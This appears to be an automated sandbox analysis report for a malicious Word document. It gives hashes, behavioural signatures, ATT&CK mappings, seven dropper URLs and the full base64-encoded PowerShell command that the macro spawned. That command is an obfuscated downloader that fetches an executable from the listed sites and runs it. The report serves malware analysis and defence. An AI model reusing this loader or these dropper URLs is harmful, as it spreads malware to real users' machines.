52b222374831f845dcf2ceb94ddf3a7e56ff1b2401ca994464a2cc99cbe60aec

General

Target

113c78cca7bcb3422669ab5d30223d24_JaffaCakes118.doc
Size

175KB
MD5

113c78cca7bcb3422669ab5d30223d24
SHA1

e687532ec20b9b3ffd5770b3cbcea45c4cd9516f
SHA256

52b222374831f845dcf2ceb94ddf3a7e56ff1b2401ca994464a2cc99cbe60aec
SHA512

e1c6e283b9336ef0fafda72e5731178384ac9165c23bba62aa5a1d66817ae056429096c938f20edc0ee82df66f95326489b06267b3bb942643ddbff5bd481412
SSDEEP

3072:O9ufstRUUKSns8T00JSHUgteMJ8qMD7gTaBBGB4c:O9ufsfgIf0pLuBBGB4c

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://bonyanet.com/wp-admin/iR/

exe.dropper

http://ofoghzagros.com/wp-admin/H/

exe.dropper

https://ilinknepal.com/infosysnepal.com/Zdz/

exe.dropper

https://storypostar.com/wp-admin/j/

exe.dropper

https://www.pixelstoryteller.com/hydroplane-definition/wzb/

exe.dropper

https://redchillicrackers.com/wp-content/p/

exe.dropper

http://www.co-traveling.com/cgi-bin/003/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3288	2432	POwersheLL.exe	84

Blocklisted process makes network request 6 IoCs

flow	pid	Process
27	3288	POwersheLL.exe
36	3288	POwersheLL.exe
40	3288	POwersheLL.exe
46	3288	POwersheLL.exe
58	3288	POwersheLL.exe
60	3288	POwersheLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4392	WINWORD.EXE
4392	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3288	POwersheLL.exe
3288	POwersheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3288	POwersheLL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
4392	WINWORD.EXE
4392	WINWORD.EXE
4392	WINWORD.EXE
4392	WINWORD.EXE
4392	WINWORD.EXE
4392	WINWORD.EXE
4392	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\113c78cca7bcb3422669ab5d30223d24_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4392

C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
POwersheLL -ENCOD JABIAHMAdgBqADYAagBtAD0AKAAoACcASgA5ACcAKwAnAHQAJwApACsAJwBvAHIAJwArACcAXwA5ACcAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAGUAbgBWADoAVQBzAEUAcgBwAHIATwBmAGkAbABlAFwAdQBfADMAeQBCADQAcgBcAGoAMAA0AGEAZwA3AFoAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABpAFIAZQBjAHQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBDAGAAVQBSAGAASQB0AHkAUABSAGAATwBUAE8AYABjAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzACcAKQArACgAJwAxADIALAAgAHQAJwArACcAbAAnACsAJwBzADEAMQAsACcAKQArACcAIAAnACsAJwB0ACcAKwAnAGwAcwAnACkAOwAkAFoAZgBlADcAcgA4ADEAIAA9ACAAKAAoACcASQBiACcAKwAnAGYAZQAnACkAKwAoACcAOAAnACsAJwBiADYAJwApACsAJwA0ACcAKQA7ACQAWgA5ADMAYgAzAHAAZQA9ACgAJwBXACcAKwAoACcAdgAnACsAJwAwAGwAcgAyACcAKQArACcAdAAnACkAOwAkAFAAbQB1AGsAMQA1ADQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcARAAnACsAKAAnAHkAZgBVACcAKwAnAF8AMwB5ACcAKwAnAGIAJwApACsAJwA0AHIAJwArACgAJwBEACcAKwAnAHkAZgBKADAANAAnACkAKwAnAGEAZwAnACsAJwA3ACcAKwAoACcAegBEACcAKwAnAHkAZgAnACkAKQAgAC0AcgBlAHAATABhAEMARQAgACgAWwBDAGgAQQBSAF0ANgA4ACsAWwBDAGgAQQBSAF0AMQAyADEAKwBbAEMAaABBAFIAXQAxADAAMgApACwAWwBDAGgAQQBSAF0AOQAyACkAKwAkAFoAZgBlADcAcgA4ADEAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFcAawBlAGoAYwBkAG4APQAoACcARQAnACsAKAAnADEAZQAnACsAJwAxAHUAbgBqACcAKQApADsAJABZAGEAbwBnAHcAbwB1AD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABuAEUAdAAuAFcAZQBiAEMAbABJAEUAbgB0ADsAJABUAGcAcwB0AHQAdgA3AD0AKAAoACcAaAAnACsAJwB0AHQAJwArACcAcAAnACsAJwA6AC8ALwBiAG8AbgB5AGEAbgBlACcAKwAnAHQALgBjAG8AbQAnACsAJwAvAHcAcAAtAGEAZABtACcAKwAnAGkAbgAvAGkAUgAvACcAKQArACcAKgBoACcAKwAoACcAdAAnACsAJwB0AHAAJwApACsAJwA6ACcAKwAoACcALwAvAG8AJwArACcAZgBvACcAKQArACcAZwBoACcAKwAoACcAegBhAGcAJwArACcAcgBvAHMALgBjAG8AJwArACcAbQAvAHcAJwArACcAcAAtAGEAJwApACsAKAAnAGQAbQBpAG4ALwAnACsAJwBIAC8AKgBoAHQAdABwACcAKwAnAHMAJwArACcAOgAvACcAKQArACgAJwAvAGkAJwArACcAbABpACcAKQArACgAJwBuAGsAbgAnACsAJwBlAHAAYQAnACkAKwAnAGwALgAnACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAKAAnAGkAbgAnACsAJwBmAG8AcwAnACsAJwB5AHMAJwArACcAbgBlAHAAYQAnACkAKwAoACcAbAAuACcAKwAnAGMAJwApACsAJwBvAG0AJwArACgAJwAvAFoAZAB6AC8AKgAnACsAJwBoACcAKwAnAHQAdABwACcAKQArACcAcwAnACsAJwA6AC8AJwArACcALwAnACsAKAAnAHMAdABvACcAKwAnAHIAeQBwACcAKwAnAG8AJwApACsAJwBzAHQAJwArACgAJwBhAHIAJwArACcALgBjACcAKQArACcAbwAnACsAJwBtACcAKwAoACcALwAnACsAJwB3AHAAJwApACsAJwAtAGEAJwArACgAJwBkACcAKwAnAG0AaQBuAC8AJwApACsAKAAnAGoALwAnACsAJwAqAGgAdAB0ACcAKQArACcAcABzACcAKwAoACcAOgAvAC8AJwArACcAdwB3AHcAJwArACcALgBwAGkAeABlAGwAcwAnACsAJwB0AG8AcgAnACkAKwAoACcAeQAnACsAJwB0ACcAKwAnAGUAbABsACcAKwAnAGUAcgAuAGMAbwBtAC8AaAB5AGQAcgAnACsAJwBvAHAAbABhAG4AJwApACsAKAAnAGUALQBkAGUAZgAnACsAJwBpAG4AaQAnACsAJwB0AGkAbwBuACcAKwAnAC8AdwB6AGIAJwArACcALwAqACcAKwAnAGgAdAAnACkAKwAoACcAdABwAHMAOgAnACsAJwAvACcAKwAnAC8AcgBlACcAKwAnAGQAYwBoAGkAbABsACcAKwAnAGkAYwByACcAKQArACgAJwBhAGMAJwArACcAawBlACcAKQArACgAJwByACcAKwAnAHMALgBjAG8AbQAnACsAJwAvAHcAJwApACsAKAAnAHAALQAnACsAJwBjACcAKwAnAG8AbgB0AGUAJwArACcAbgB0AC8AcAAnACkAKwAoACcALwAqAGgAJwArACcAdAAnACkAKwAnAHQAJwArACgAJwBwACcAKwAnADoALwAvAHcAJwArACcAdwB3ACcAKQArACcALgBjACcAKwAnAG8AJwArACgAJwAtAHQAJwArACcAcgBhAHYAZQAnACkAKwAoACcAbABpAG4AZwAuAGMAJwArACcAbwBtACcAKwAnAC8AYwAnACsAJwBnACcAKQArACgAJwBpAC0AYgBpAG4ALwAnACsAJwAwADAAMwAnACkAKwAnAC8AJwApAC4AIgBTAGAAcABsAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFUAbwA2AG0AdgA3AHcAPQAoACgAJwBLACcAKwAnADkAdwBvADAAJwApACsAJwBtADYAJwApADsAZgBvAHIAZQBhAGMAaAAoACQATwBiAHgAOQBkAHkAMQAgAGkAbgAgACQAVABnAHMAdAB0AHYANwApAHsAdAByAHkAewAkAFkAYQBvAGcAdwBvAHUALgAiAEQAYABvAGAAVwBOAEwAbwBgAEEARABGAGkAbABFACIAKAAkAE8AYgB4ADkAZAB5ADEALAAgACQAUABtAHUAawAxADUANAApADsAJABRAHMAYgAzADIAdQA0AD0AKAAoACcATwAxACcAKwAnADcAJwApACsAKAAnAGIAJwArACcAawBvADgAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQAnACsAJwBtACcAKQAgACQAUABtAHUAawAxADUANAApAC4AIgBMAGAAZQBOAGAAZwBUAGgAIgAgAC0AZwBlACAAMgA5ADgANQAxACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawBlAC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAKAAkAFAAbQB1AGsAMQA1ADQAKQA7ACQASQB0AGQANwBnAGIAXwA9ACgAJwBRACcAKwAoACcANgBmAHIAJwArACcAMAAnACkAKwAnAGMANQAnACkAOwBiAHIAZQBhAGsAOwAkAFYAZABjAGwAcgA4AGoAPQAoACcAWgAnACsAKAAnADMANgAnACsAJwBhAHUAaAAnACkAKwAnAGEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABEAGMAeAA0ADIAbwBxAD0AKAAnAEIAJwArACcAZABlACcAKwAoACcAegB5AHAAJwArACcAdgAnACkAKQA=
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3288

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCD880A.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dp0kab1a.eqw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\u_3yB4r\j04ag7Z\Ibfe8b64.exe

Filesize
174KB

MD5
0943d5918c10d730e5313297cb61b76e

SHA1
ecb84767b88eee7fdcf4bbb5a5d82f796e3f09f3

SHA256
b5e20f7a2454542d81c9228f1020db57fbb6cacf544ba391dbe18ae26a05203f

SHA512
bb70423f467480d972b206db148bd532ca1dc17e1d849a37bf9786367563fe8d40aeecbbca2355a32231b41023ccca94b592902023a3aea027f6b2e3ae83d390

Download Submit
memory/3288-67-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/3288-96-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/3288-70-0x0000021963200000-0x0000021963222000-memory.dmp

Filesize
136KB

Download
memory/4392-8-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-32-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-9-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-0-0x00007FFF7F9D0000-0x00007FFF7F9E0000-memory.dmp

Filesize
64KB

Download
memory/4392-10-0x00007FFF7D450000-0x00007FFF7D460000-memory.dmp

Filesize
64KB

Download
memory/4392-11-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-12-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-14-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-15-0x00007FFF7D450000-0x00007FFF7D460000-memory.dmp

Filesize
64KB

Download
memory/4392-16-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-13-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-18-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-20-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-19-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-17-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-7-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-33-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-6-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-5-0x00007FFFBF9ED000-0x00007FFFBF9EE000-memory.dmp

Filesize
4KB

Download
memory/4392-1-0x00007FFF7F9D0000-0x00007FFF7F9E0000-memory.dmp

Filesize
64KB

Download
memory/4392-4-0x00007FFF7F9D0000-0x00007FFF7F9E0000-memory.dmp

Filesize
64KB

Download
memory/4392-3-0x00007FFF7F9D0000-0x00007FFF7F9E0000-memory.dmp

Filesize
64KB

Download
memory/4392-2-0x00007FFF7F9D0000-0x00007FFF7F9E0000-memory.dmp

Filesize
64KB

Download
memory/4392-556-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-575-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-576-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download
memory/4392-600-0x00007FFF7F9D0000-0x00007FFF7F9E0000-memory.dmp

Filesize
64KB

Download
memory/4392-599-0x00007FFF7F9D0000-0x00007FFF7F9E0000-memory.dmp

Filesize
64KB

Download
memory/4392-598-0x00007FFF7F9D0000-0x00007FFF7F9E0000-memory.dmp

Filesize
64KB

Download
memory/4392-597-0x00007FFF7F9D0000-0x00007FFF7F9E0000-memory.dmp

Filesize
64KB

Download
memory/4392-601-0x00007FFFBF950000-0x00007FFFBFB45000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads